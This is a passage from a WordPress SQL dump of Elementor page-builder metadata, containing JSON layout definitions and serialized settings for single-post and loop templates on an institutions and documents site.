System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27778,4034,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27779,4034,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27783,3109,'_pods_file_type_image','a:1:{i:0;i:4032;}'),(27786,4036,'_elementor_edit_mode','builder'),(27787,4036,'_elementor_template_type','single-post'),(27788,4036,'_elementor_version','3.4.0'),(27789,4036,'_elementor_pro_version','3.3.6'),(27790,4036,'_wp_page_template','default'),(27791,4036,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(38606,74,'_elementor_css','a:6:{s:4:\"time\";i:1770880131;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(27793,4036,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27794,4036,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27798,4037,'_elementor_edit_mode','builder'),(27799,4037,'_elementor_template_type','single-post'),(27800,4037,'_elementor_version','3.4.0'),(27801,4037,'_elementor_pro_version','3.3.6'),(27802,4037,'_wp_page_template','default'),(27803,4037,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27805,4037,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27806,4037,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27810,4039,'_elementor_edit_mode','builder'),(27811,4039,'_elementor_template_type','loop'),(27812,4039,'_elementor_version','3.4.0'),(27813,4039,'_elementor_pro_version','3.3.6'),(27814,4039,'_wp_page_template','default'),(27815,4039,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(27816,4039,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.9189999999999969304553815163671970367431640625},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":56.9140000000000014779288903810083866119384765625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27821,4040,'_elementor_edit_mode','builder'),(27822,4040,'_elementor_template_type','loop'),(27823,4040,'_elementor_version','3.4.0'),(27824,4040,'_elementor_pro_version','3.3.6'),(27825,4040,'_wp_page_template','default'),(27826,4040,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(27827,4040,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag 